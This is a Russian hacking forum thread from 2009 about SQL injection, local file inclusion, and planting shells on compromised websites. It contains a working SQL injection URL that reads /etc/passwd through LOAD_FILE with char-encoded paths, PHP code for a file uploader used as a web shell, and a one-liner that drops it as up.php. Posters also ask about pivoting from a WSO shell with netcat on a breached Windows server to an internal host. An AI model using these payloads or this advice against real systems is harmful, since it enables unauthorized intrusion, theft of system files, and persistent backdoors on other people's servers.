ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.12.2009, 22:59
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Цитата:
Сообщение от mailbrush  
Кто тебе сказал, что через LOAD_FILE нельзя читать PHP-код?
А вот тут мнения у очень многих расходятся.
Но перевес идёт в счёт того что всё таки код выполнится, что меня очень радует.
Только вот уже минут 30 не могу найти тему про LFI на ачате как прочитать апачевые логи, сессии со вставленным php кодом....
 
Ответить с цитированием

  #2  
Старый 19.12.2009, 23:03
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами: 9679872

Репутация: 347
По умолчанию

Цитата:
Сообщение от Nightmarе  
А вот тут мнения у очень многих расходятся.
Но перевес идёт в счёт того что всё таки код выполнится, что меня очень радует.
такие вопросы голосованием не решаются
не выполнится, только разве что скрипт зачем-нибудь поставит результаты запроса в eval. Полагаю, такая ситуация очень маловероятна
 
Ответить с цитированием

  #3  
Старый 19.12.2009, 23:06
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

Цитата:
Сообщение от Nightmarе  
А вот тут мнения у очень многих расходятся.
Но перевес идёт в счёт того что всё таки код выполнится, что меня очень радует.
Только вот уже минут 30 не могу найти тему про LFI на ачате как прочитать апачевые логи, сессии со вставленным php кодом....
мне кажется ты путаешь читалку через sql-inj и php инклуд.
в твоем случае возможно есть чтение файлов через load_file(hex/char значение пути и имени). Но в этом случае ты читаешь файл, а не вынуждаешь его выполниться как php-код.
почитай про load_file

ps
Пример чтения /etc/passwd:
Цитата:
http://www.site.ru/index.php?page=-1+union+select+1,2,LOAD_FILE(char(47,101,116,99,47 ,112,97,115,115,119,100)),4,5,6/*
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #4  
Старый 19.12.2009, 23:21
Матня
Banned
Регистрация: 19.12.2009
Сообщений: 4
С нами: 8628628

Репутация: 0
По умолчанию

Подскажите плиз. Мне нужен скрипт для залития аплоадера файлов через /proc/self/environ т.е. этот скрипт заливает аплоадер в корень сайта. раньше мне чел под ником попугай дал его. но у меня полетел сервак и скрипт пропал. может есть у кого.
 
Ответить с цитированием

  #5  
Старый 20.12.2009, 00:07
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами: 9419426

Репутация: 648
По умолчанию

Цитата:
Сообщение от Матня  
Подскажите плиз. Мне нужен скрипт для залития аплоадера файлов через /proc/self/environ т.е. этот скрипт заливает аплоадер в корень сайта. раньше мне чел под ником попугай дал его. но у меня полетел сервак и скрипт пропал. может есть у кого.

Что значит залитие аплоадера файлов?
Через /proc/self/environ можно залить шелл. Читай, например, здесь.
 
Ответить с цитированием

  #6  
Старый 20.12.2009, 13:06
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами: 9679872

Репутация: 347
По умолчанию

Цитата:
Сообщение от Root-access  
Что значит залитие аплоадера файлов?
Через /proc/self/environ можно залить шелл. Читай, например, здесь.
Мне кажется Матня имел ввиду просто аплоадер файлов
Код:
<form enctype=multipart/form-data  method=post>
<input name=x type=file><input type=submit></form>
<?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>
Ну а код, который этот аплоадер создает:
Код:
<?php $f = fopen('up.php','w');fwrite($f,'<form enctype=multipart/form-data  method=post><input name=x type=file><input type=submit></form><?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>');fclose($f); ?>
 
Ответить с цитированием

  #7  
Старый 20.12.2009, 00:01
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

когда я говорил про LFI, то не имел в виду load_file, если вы не встречали таких скулей, где одновременно и скуля и LFI - то еще встретите. Просто надо внимательно читать ошибки, которые выводятся на экран.
 
Ответить с цитированием

  #8  
Старый 20.12.2009, 12:09
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

люди,знаю, что много раз обсуждалось, но все же, на фтп на все папки стоят права 755,а на файлы 644, ничего не могу залить. Можно ли как то обойти эту проблему?
P.S. Если есть мануалы, с радостью почитаю

Последний раз редактировалось jecka3000; 20.12.2009 в 12:45..
 
Ответить с цитированием

  #9  
Старый 20.12.2009, 13:05
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами: 8730571

Репутация: 19
По умолчанию

Помогите будьласка! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??
 
Ответить с цитированием

  #10  
Старый 20.12.2009, 17:19
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

Цитата:
Сообщение от Cybersteger  
Помогите будьласка! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??
http://forum.antichat.ru/showthread.php?t=107655
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.